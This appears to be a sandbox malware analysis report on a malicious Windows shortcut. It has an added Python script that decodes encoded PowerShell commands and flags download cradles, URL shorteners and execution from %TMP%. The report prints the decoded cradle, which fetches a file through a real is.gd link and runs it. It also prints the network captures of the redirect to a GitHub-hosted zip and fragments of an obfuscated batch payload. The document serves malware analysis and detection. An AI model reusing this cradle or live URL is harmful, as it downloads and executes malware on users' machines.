                      Relative Path:..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command Line Argument:-e aQB3AHIAIABpAHMALgBnAGQALwBqAHcAcgA3AEoARAAgAC0AbwAgACQAZQBuAHYAOgBUAE0AUAAvAC4AYwBtAGQAOwAmACAAJABlAG4AdgA6AFQATQBQAC8ALgBjAG0AZAA=
Decoded argument (-e is PowerShell's -EncodedCommand: Base64 over UTF-16LE): iwr is.gd/jwr7JD -o $env:TMP/.cmd;& $env:TMP/.cmd
That is, Invoke-WebRequest fetches a file through the is.gd URL shortener, writes it as .cmd under %TMP%, and the call operator (&) runs it.
                      Icon location:
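The shortcut's encoded command, worked through as an added triage example (not code from the report or from Joe Sandbox): it locates a -EncodedCommand argument on a PowerShell command line, decodes the Base64/UTF-16LE payload, and flags the behaviours the report's signatures call out (download cradle, URL shortener, staging and execution from %TMP%). The sample command line is constructed here from the "Relative Path" and "Command Line Argument" fields above; the indicator lists are illustrative assumptions, not part of the report.

```python
import base64
import binascii
import re
import shlex

# Constructed sample input: the shortcut's target and its "-e" argument, taken from the
# report's "General" section and joined into one command line.
SAMPLE_CMDLINE = (
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -e "
    "aQB3AHIAIABpAHMALgBnAGQALwBqAHcAcgA3AEoARAAgAC0AbwAgACQAZQBuAHYAOgBUAE0AUAAv"
    "AC4AYwBtAGQAOwAmACAAJABlAG4AdgA6AFQATQBQAC8ALgBjAG0AZAA="
)

# Illustrative indicator lists (assumptions chosen for this example, not from the report).
DOWNLOAD_CRADLES = ("iwr", "invoke-webrequest", "irm", "invoke-restmethod", "downloadstring",
                    "downloadfile", "curl", "wget", "start-bitstransfer")
URL_SHORTENERS = ("is.gd", "bit.ly", "tinyurl.com", "t.co", "cutt.ly", "rb.gy")
# Writes or references under the user's temp directory.
TEMP_PATHS = re.compile(r"\$env:(?:tmp|temp)\b|\\appdata\\local\\temp\\", re.IGNORECASE)
# The call operator applied to something under temp, e.g. "& $env:TMP/.cmd".
EXEC_FROM_TEMP = re.compile(r"&\s*['\"]?\$env:(?:tmp|temp)\b", re.IGNORECASE)


def _is_encoded_flag(token: str) -> bool:
    """PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)."""
    t = token.lower()
    return t.startswith("-e") and "-encodedcommand".startswith(t)


def decode_encoded_command(blob: str):
    """Decode a -EncodedCommand payload (Base64 wrapping UTF-16LE); None if it is not one."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    if len(raw) % 2:
        return None  # a UTF-16LE payload is always an even number of bytes
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        return None


def _contains_domain(text: str, domain: str) -> bool:
    """Match a shortener domain as a whole host label, not as a substring of a longer name."""
    pattern = r"(?<![a-z0-9.-])" + re.escape(domain) + r"(?![a-z0-9-])"
    return re.search(pattern, text) is not None


def triage_powershell_cmdline(cmdline: str) -> dict:
    """Decode an encoded PowerShell command line and list the behaviours it exhibits."""
    # posix=False keeps the backslashes of Windows paths intact.
    tokens = shlex.split(cmdline, posix=False)
    decoded = None
    for idx, tok in enumerate(tokens[:-1]):
        if _is_encoded_flag(tok):
            decoded = decode_encoded_command(tokens[idx + 1])
            break
    result = {"decoded": decoded, "indicators": []}
    if decoded is None:
        return result
    low = decoded.lower()
    words = set(re.findall(r"[a-z][a-z0-9_-]*", low))
    if words & set(DOWNLOAD_CRADLES):
        result["indicators"].append("download_cradle")
    if any(_contains_domain(low, d) for d in URL_SHORTENERS):
        result["indicators"].append("url_shortener")
    if TEMP_PATHS.search(decoded):
        result["indicators"].append("writes_to_temp")
    if EXEC_FROM_TEMP.search(decoded):
        result["indicators"].append("executes_from_temp")
    return result


if __name__ == "__main__":
    verdict = triage_powershell_cmdline(SAMPLE_CMDLINE)
    print("decoded   :", verdict["decoded"])
    print("indicators:", ", ".join(verdict["indicators"]))
```

The prefix check matters in practice: detection content keyed only on the literal `-EncodedCommand` misses `-e`, `-ec` and `-enc`, all of which PowerShell resolves to the same parameter, and the even-length check rejects plain-ASCII Base64 that was never a UTF-16LE command.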
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 5, 2024 14:51:29.526643038 CEST | 49710 | 80 | 192.168.2.6 | 104.25.234.53
Oct 5, 2024 14:51:29.531449080 CEST | 80 | 49710 | 104.25.234.53 | 192.168.2.6
Oct 5, 2024 14:51:29.531527996 CEST | 49710 | 80 | 192.168.2.6 | 104.25.234.53
Oct 5, 2024 14:51:29.534039974 CEST | 49710 | 80 | 192.168.2.6 | 104.25.234.53
Oct 5, 2024 14:51:29.538923979 CEST | 80 | 49710 | 104.25.234.53 | 192.168.2.6
Oct 5, 2024 14:51:29.988699913 CEST | 80 | 49710 | 104.25.234.53 | 192.168.2.6
Oct 5, 2024 14:51:29.997621059 CEST | 49711 | 443 | 192.168.2.6 | 104.25.234.53
Oct 5, 2024 14:51:29.997726917 CEST | 443 | 49711 | 104.25.234.53 | 192.168.2.6
Oct 5, 2024 14:51:29.997823000 CEST | 49711 | 443 | 192.168.2.6 | 104.25.234.53
Oct 5, 2024 14:51:30.005881071 CEST | 49711 | 443 | 192.168.2.6 | 104.25.234.53
Oct 5, 2024 14:51:30.005928040 CEST | 443 | 49711 | 104.25.234.53 | 192.168.2.6
Oct 5, 2024 14:51:30.041359901 CEST | 49710 | 80 | 192.168.2.6 | 104.25.234.53
Oct 5, 2024 14:51:30.601675987 CEST | 443 | 49711 | 104.25.234.53 | 192.168.2.6
Oct 5, 2024 14:51:30.601774931 CEST | 49711 | 443 | 192.168.2.6 | 104.25.234.53
Oct 5, 2024 14:51:30.606858969 CEST | 49711 | 443 | 192.168.2.6 | 104.25.234.53
Oct 5, 2024 14:51:30.606893063 CEST | 443 | 49711 | 104.25.234.53 | 192.168.2.6
Oct 5, 2024 14:51:30.607331991 CEST | 443 | 49711 | 104.25.234.53 | 192.168.2.6
Oct 5, 2024 14:51:30.620079041 CEST | 49711 | 443 | 192.168.2.6 | 104.25.234.53
Oct 5, 2024 14:51:30.667406082 CEST | 443 | 49711 | 104.25.234.53 | 192.168.2.6
Oct 5, 2024 14:51:30.739032984 CEST | 443 | 49711 | 104.25.234.53 | 192.168.2.6
Oct 5, 2024 14:51:30.739187956 CEST | 443 | 49711 | 104.25.234.53 | 192.168.2.6
Oct 5, 2024 14:51:30.739267111 CEST | 49711 | 443 | 192.168.2.6 | 104.25.234.53
Oct 5, 2024 14:51:30.742386103 CEST | 49711 | 443 | 192.168.2.6 | 104.25.234.53
Oct 5, 2024 14:51:30.751351118 CEST | 49712 | 443 | 192.168.2.6 | 140.82.121.4
Oct 5, 2024 14:51:30.751415014 CEST | 443 | 49712 | 140.82.121.4 | 192.168.2.6
Oct 5, 2024 14:51:30.751467943 CEST | 49712 | 443 | 192.168.2.6 | 140.82.121.4
Oct 5, 2024 14:51:30.751703024 CEST | 49712 | 443 | 192.168.2.6 | 140.82.121.4
Oct 5, 2024 14:51:30.751722097 CEST | 443 | 49712 | 140.82.121.4 | 192.168.2.6
Oct 5, 2024 14:51:31.396028996 CEST | 443 | 49712 | 140.82.121.4 | 192.168.2.6
Oct 5, 2024 14:51:31.396092892 CEST | 49712 | 443 | 192.168.2.6 | 140.82.121.4
Oct 5, 2024 14:51:31.398580074 CEST | 49712 | 443 | 192.168.2.6 | 140.82.121.4
Oct 5, 2024 14:51:31.398598909 CEST | 443 | 49712 | 140.82.121.4 | 192.168.2.6
Oct 5, 2024 14:51:31.399003029 CEST | 443 | 49712 | 140.82.121.4 | 192.168.2.6
Oct 5, 2024 14:51:31.399748087 CEST | 49712 | 443 | 192.168.2.6 | 140.82.121.4
Oct 5, 2024 14:51:31.447415113 CEST | 443 | 49712 | 140.82.121.4 | 192.168.2.6
Oct 5, 2024 14:51:31.778475046 CEST | 443 | 49712 | 140.82.121.4 | 192.168.2.6
Oct 5, 2024 14:51:31.779043913 CEST | 443 | 49712 | 140.82.121.4 | 192.168.2.6
Oct 5, 2024 14:51:31.779118061 CEST | 49712 | 443 | 192.168.2.6 | 140.82.121.4
Oct 5, 2024 14:51:31.779155970 CEST | 443 | 49712 | 140.82.121.4 | 192.168.2.6
Oct 5, 2024 14:51:31.779176950 CEST | 443 | 49712 | 140.82.121.4 | 192.168.2.6
Oct 5, 2024 14:51:31.779202938 CEST | 49712 | 443 | 192.168.2.6 | 140.82.121.4
Oct 5, 2024 14:51:31.779228926 CEST | 49712 | 443 | 192.168.2.6 | 140.82.121.4
Oct 5, 2024 14:51:31.784429073 CEST | 49712 | 443 | 192.168.2.6 | 140.82.121.4
Oct 5, 2024 14:51:31.809322119 CEST | 49714 | 443 | 192.168.2.6 | 185.199.111.133
Oct 5, 2024 14:51:31.809366941 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:31.809423923 CEST | 49714 | 443 | 192.168.2.6 | 185.199.111.133
Oct 5, 2024 14:51:31.810617924 CEST | 49714 | 443 | 192.168.2.6 | 185.199.111.133
Oct 5, 2024 14:51:31.810633898 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.275971889 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.276283026 CEST | 49714 | 443 | 192.168.2.6 | 185.199.111.133
Oct 5, 2024 14:51:32.277880907 CEST | 49714 | 443 | 192.168.2.6 | 185.199.111.133
Oct 5, 2024 14:51:32.277888060 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.278315067 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.279134035 CEST | 49714 | 443 | 192.168.2.6 | 185.199.111.133
Oct 5, 2024 14:51:32.323401928 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.465259075 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.466104031 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.466167927 CEST | 49714 | 443 | 192.168.2.6 | 185.199.111.133
Oct 5, 2024 14:51:32.466203928 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.466329098 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.466392040 CEST | 49714 | 443 | 192.168.2.6 | 185.199.111.133
Oct 5, 2024 14:51:32.466401100 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.466483116 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.466545105 CEST | 49714 | 443 | 192.168.2.6 | 185.199.111.133
Oct 5, 2024 14:51:32.466551065 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.466854095 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.466903925 CEST | 49714 | 443 | 192.168.2.6 | 185.199.111.133
Oct 5, 2024 14:51:32.466909885 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.467000008 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.467055082 CEST | 49714 | 443 | 192.168.2.6 | 185.199.111.133
Oct 5, 2024 14:51:32.467061996 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.509937048 CEST | 49714 | 443 | 192.168.2.6 | 185.199.111.133
Oct 5, 2024 14:51:32.509957075 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.552663088 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.552748919 CEST | 49714 | 443 | 192.168.2.6 | 185.199.111.133
Oct 5, 2024 14:51:32.552756071 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.552839994 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.552886963 CEST | 49714 | 443 | 192.168.2.6 | 185.199.111.133
Oct 5, 2024 14:51:32.552892923 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.552999020 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.553050041 CEST | 49714 | 443 | 192.168.2.6 | 185.199.111.133
Oct 5, 2024 14:51:32.553056002 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.553168058 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.553215027 CEST | 49714 | 443 | 192.168.2.6 | 185.199.111.133
Oct 5, 2024 14:51:32.553220987 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.553334951 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.553383112 CEST | 49714 | 443 | 192.168.2.6 | 185.199.111.133
Oct 5, 2024 14:51:32.553389072 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.553575993 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.553622961 CEST | 49714 | 443 | 192.168.2.6 | 185.199.111.133
Oct 5, 2024 14:51:32.553627968 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.555747032 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.555768967 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.555805922 CEST | 49714 | 443 | 192.168.2.6 | 185.199.111.133
Oct 5, 2024 14:51:32.555808067 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.555836916 CEST | 49714 | 443 | 192.168.2.6 | 185.199.111.133
Oct 5, 2024 14:51:32.555840015 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.555860043 CEST | 49714 | 443 | 192.168.2.6 | 185.199.111.133
Oct 5, 2024 14:51:32.555892944 CEST | 49714 | 443 | 192.168.2.6 | 185.199.111.133
Oct 5, 2024 14:51:32.639878035 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.639908075 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.639946938 CEST | 49714 | 443 | 192.168.2.6 | 185.199.111.133
Oct 5, 2024 14:51:32.639959097 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.639987946 CEST | 49714 | 443 | 192.168.2.6 | 185.199.111.133
Oct 5, 2024 14:51:32.640008926 CEST | 49714 | 443 | 192.168.2.6 | 185.199.111.133
Oct 5, 2024 14:51:32.641064882 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.641086102 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.641119957 CEST | 49714 | 443 | 192.168.2.6 | 185.199.111.133
Oct 5, 2024 14:51:32.641125917 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.641150951 CEST | 49714 | 443 | 192.168.2.6 | 185.199.111.133
Oct 5, 2024 14:51:32.641170979 CEST | 49714 | 443 | 192.168.2.6 | 185.199.111.133
Oct 5, 2024 14:51:32.642858028 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.642878056 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.642913103 CEST | 49714 | 443 | 192.168.2.6 | 185.199.111.133
Oct 5, 2024 14:51:32.642916918 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.642975092 CEST | 49714 | 443 | 192.168.2.6 | 185.199.111.133
Oct 5, 2024 14:51:32.642987013 CEST | 49714 | 443 | 192.168.2.6 | 185.199.111.133
Oct 5, 2024 14:51:32.644676924 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.644694090 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.644745111 CEST | 49714 | 443 | 192.168.2.6 | 185.199.111.133
Oct 5, 2024 14:51:32.644752026 CEST | 443 | 49714 | 185.199.111.133 | 192.168.2.6
Oct 5, 2024 14:51:32.644778967 CEST | 49714 | 443 | 192.168.2.6 | 185.199.111.133
Oct 5, 2024 14:51:32.644784927 CEST | 49714 | 443 | 192.168.2.6 | 185.199.111.133
                      Oct 5, 2024 14:51:32.726413012 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.726449013 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.726496935 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.726619005 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.726625919 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:32.726625919 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:32.726671934 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:32.736278057 CEST49714443192.168.2.6185.199.111.133
                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      Oct 5, 2024 14:51:29.509161949 CEST | 56456 | 53 | 192.168.2.6 | 1.1.1.1
                      Oct 5, 2024 14:51:29.516081095 CEST | 53 | 56456 | 1.1.1.1 | 192.168.2.6
                      Oct 5, 2024 14:51:30.743479013 CEST | 56181 | 53 | 192.168.2.6 | 1.1.1.1
                      Oct 5, 2024 14:51:30.750808001 CEST | 53 | 56181 | 1.1.1.1 | 192.168.2.6
                      Oct 5, 2024 14:51:31.799606085 CEST | 57657 | 53 | 192.168.2.6 | 1.1.1.1
                      Oct 5, 2024 14:51:31.806504965 CEST | 53 | 57657 | 1.1.1.1 | 192.168.2.6
                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                      Oct 5, 2024 14:51:29.509161949 CEST | 192.168.2.6 | 1.1.1.1 | 0xd22d | Standard query (0) | is.gd | A (IP address) | IN (0x0001) | false
                      Oct 5, 2024 14:51:30.743479013 CEST | 192.168.2.6 | 1.1.1.1 | 0xe20e | Standard query (0) | github.com | A (IP address) | IN (0x0001) | false
                      Oct 5, 2024 14:51:31.799606085 CEST | 192.168.2.6 | 1.1.1.1 | 0x77f6 | Standard query (0) | objects.githubusercontent.com | A (IP address) | IN (0x0001) | false
                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                      Oct 5, 2024 14:51:29.516081095 CEST | 1.1.1.1 | 192.168.2.6 | 0xd22d | No error (0) | is.gd |  | 104.25.234.53 | A (IP address) | IN (0x0001) | false
                      Oct 5, 2024 14:51:29.516081095 CEST | 1.1.1.1 | 192.168.2.6 | 0xd22d | No error (0) | is.gd |  | 104.25.233.53 | A (IP address) | IN (0x0001) | false
                      Oct 5, 2024 14:51:29.516081095 CEST | 1.1.1.1 | 192.168.2.6 | 0xd22d | No error (0) | is.gd |  | 172.67.83.132 | A (IP address) | IN (0x0001) | false
                      Oct 5, 2024 14:51:30.750808001 CEST | 1.1.1.1 | 192.168.2.6 | 0xe20e | No error (0) | github.com |  | 140.82.121.4 | A (IP address) | IN (0x0001) | false
                      Oct 5, 2024 14:51:31.806504965 CEST | 1.1.1.1 | 192.168.2.6 | 0x77f6 | No error (0) | objects.githubusercontent.com |  | 185.199.111.133 | A (IP address) | IN (0x0001) | false
                      Oct 5, 2024 14:51:31.806504965 CEST | 1.1.1.1 | 192.168.2.6 | 0x77f6 | No error (0) | objects.githubusercontent.com |  | 185.199.109.133 | A (IP address) | IN (0x0001) | false
                      Oct 5, 2024 14:51:31.806504965 CEST | 1.1.1.1 | 192.168.2.6 | 0x77f6 | No error (0) | objects.githubusercontent.com |  | 185.199.110.133 | A (IP address) | IN (0x0001) | false
                      Oct 5, 2024 14:51:31.806504965 CEST | 1.1.1.1 | 192.168.2.6 | 0x77f6 | No error (0) | objects.githubusercontent.com |  | 185.199.108.133 | A (IP address) | IN (0x0001) | false
                      • is.gd
                      • github.com
                      • objects.githubusercontent.com
                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      0 | 192.168.2.6 | 49710 | 104.25.234.53 | 80 | 3468 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Oct 5, 2024 14:51:29.534039974 CEST | 156 | OUT | GET /jwr7JD HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                      Host: is.gd
                      Connection: Keep-Alive
                      Oct 5, 2024 14:51:29.988699913 CEST | 700 | IN | HTTP/1.1 301 Moved Permanently
                      Date: Sat, 05 Oct 2024 12:51:29 GMT
                      Content-Type: text/html
                      Content-Length: 167
                      Connection: keep-alive
                      Cache-Control: max-age=3600
                      Expires: Sat, 05 Oct 2024 13:51:29 GMT
                      Location: https://is.gd/jwr7JD
                      Set-Cookie: __cf_bm=Tayr4UKOTuOlJGv6OCIoBHJ4cmL2nzXhL5zeIMsr6ko-1728132689-1.0.1.1-qS4.lVj4h4RY.OQgdrWtfq9Y9QXr6oRaUPFcGg14gZ9m0vnqmc5ybvfiyNPGD4qoteXBF8BfZ6EOvBvFhfIOEQ; path=/; expires=Sat, 05-Oct-24 13:21:29 GMT; domain=.is.gd; HttpOnly
                      Server: cloudflare
                      CF-RAY: 8cdd8b201b4c424a-EWR
                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      0 | 192.168.2.6 | 49711 | 104.25.234.53 | 443 | 3468 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2024-10-05 12:51:30 UTC | 323 | OUT | GET /jwr7JD HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                      Host: is.gd
                      Cookie: __cf_bm=Tayr4UKOTuOlJGv6OCIoBHJ4cmL2nzXhL5zeIMsr6ko-1728132689-1.0.1.1-qS4.lVj4h4RY.OQgdrWtfq9Y9QXr6oRaUPFcGg14gZ9m0vnqmc5ybvfiyNPGD4qoteXBF8BfZ6EOvBvFhfIOEQ
                      Connection: Keep-Alive
                      2024-10-05 12:51:30 UTC | 311 | IN | HTTP/1.1 301 Moved Permanently
                      Date: Sat, 05 Oct 2024 12:51:30 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Location: https://github.com/user-attachments/files/17251016/powershell.zip
                      CF-Cache-Status: DYNAMIC
                      Server: cloudflare
                      CF-RAY: 8cdd8b24ba818c33-EWR
                      2024-10-05 12:51:30 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      1 | 192.168.2.6 | 49712 | 140.82.121.4 | 443 | 3468 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2024-10-05 12:51:31 UTC | 201 | OUT | GET /user-attachments/files/17251016/powershell.zip HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                      Host: github.com
                      Connection: Keep-Alive
                      2024-10-05 12:51:31 UTC | 965 | IN | HTTP/1.1 302 Found
                      Server: GitHub.com
                      Date: Sat, 05 Oct 2024 12:51:31 GMT
                      Content-Type: text/html; charset=utf-8
                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                      Location: https://objects.githubusercontent.com/github-production-repository-file-5c1aeb/151309588/17251016?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20241005%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241005T125131Z&X-Amz-Expires=300&X-Amz-Signature=bd113b24a947a7e5cf396cce6dbfa45a934e7b48cceea28c8f3b3a7c39af830c&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3Bfilename%3Dpowershell.zip&response-content-type=application%2Fx-zip-compressed
                      Cache-Control: no-cache
                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                      X-Frame-Options: deny
                      X-Content-Type-Options: nosniff
                      X-XSS-Protection: 0
                      Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                      2024-10-05 12:51:31 UTC | 4058 | IN | Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      2 | 192.168.2.6 | 49714 | 185.199.111.133 | 443 | 3468 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2024-10-05 12:51:32 UTC | 620 | OUT | GET /github-production-repository-file-5c1aeb/151309588/17251016?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20241005%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241005T125131Z&X-Amz-Expires=300&X-Amz-Signature=bd113b24a947a7e5cf396cce6dbfa45a934e7b48cceea28c8f3b3a7c39af830c&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3Bfilename%3Dpowershell.zip&response-content-type=application%2Fx-zip-compressed HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                      Host: objects.githubusercontent.com
                      Connection: Keep-Alive
                      2024-10-05 12:51:32 UTC | 647 | IN | HTTP/1.1 200 OK
                      Connection: close
                      Content-Length: 132304
                      x-amz-id-2: CbUtBSCvRQEb5u3uInkOjtLHrUrZjRZngwHbdGGZWL8bJ6p2Hx9GaIkI8TM5oIgLIfhGuAQAeK4=
                      x-amz-request-id: DY29AV3E68E7E9BD
                      Last-Modified: Thu, 03 Oct 2024 23:09:19 GMT
                      ETag: "a07fcb39b340ad8dea993a5f5c4d9064"
                      x-amz-server-side-encryption: AES256
                      Content-Disposition: attachment;filename=powershell.zip
                      Content-Type: application/x-zip-compressed
                      Server: AmazonS3
                      Fastly-Restarts: 1
                      Accept-Ranges: bytes
                      Age: 0
                      Date: Sat, 05 Oct 2024 12:51:32 GMT
                      Via: 1.1 varnish
                      X-Served-By: cache-ewr-kewr1740046-EWR
                      X-Cache: HIT
                      X-Cache-Hits: 0
                      X-Timer: S1728132692.331628,VS0,VE54
                      2024-10-05 12:51:32 UTC | 1378 | IN | Data Ascii: &cls@echo offset ucbw=set:: , ,
                      2024-10-05 12:51:32 UTC | 1378 | IN | Data Ascii: : , , , ,
                      2024-10-05 12:51:32 UTC | 1378 | IN | Data Ascii: w%%qmy%zer%jxaa%e:: , ,
                      2024-10-05 12:51:32 UTC | 1378 | IN | Data Ascii: , , .%ucbw%%qmy%%ccdn%%svmh%%qmy%rtoy%jxaa%9161456 %% 91613
                      2024-10-05 12:51:32 UTC | 1378 | IN | Data Ascii: , , .%rfs%%knec%%bgr%%egsb%%ccdn%%rfs%%egsb%%zer%%dzj%%ozfl%%mey%%
                      2024-10-05 12:51:32 UTC | 1378 | IN | Data Ascii: , , , , .
                      2024-10-05 12:51:32 UTC | 1378 | IN | Data Ascii: , , .%ucbw%%qmy%%ccdn%%svmh%%qmy%syo%jxaa%4837092 %% 4
                      2024-10-05 12:51:32 UTC | 1378 | IN | Data Ascii: , .%rfs%%knec%%bgr%%
                      2024-10-05 12:51:32 UTC | 1378 | IN | Data Ascii: %%egsb%%zer%%dzj%%ozfl%%mey%%egsb%%yuoz%:: , ,
                      2024-10-05 12:51:32 UTC | 1378 | IN | Data Ascii: d%jxaa%%=exitcodeAscii%:: , ,



                      Target ID: 0
                      Start time: 08:51:26
                      Start date: 05/10/2024
                      Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit): false
                      Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e aQB3AHIAIABpAHMALgBnAGQALwBqAHcAcgA3AEoARAAgAC0AbwAgACQAZQBuAHYAOgBUAE0AUAAvAC4AYwBtAGQAOwAmACAAJABlAG4AdgA6AFQATQBQAC8ALgBjAG0AZAA=
                      Imagebase: 0x7ff6e3d50000
                      File size: 452'608 bytes
                      MD5 hash: 04029E121A0CFA5991749937DD22A1D9
                      Has elevated privileges: true
                      Has administrator privileges: true
                      Programmed in: C, C++ or other language
                      Reputation: high
                      Has exited: false

                      Target ID: 1
                      Start time: 08:51:26
                      Start date: 05/10/2024
                      Path: C:\Windows\System32\conhost.exe
                      Wow64 process (32bit): false
                      Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase: 0x7ff66e660000
                      File size: 862'208 bytes
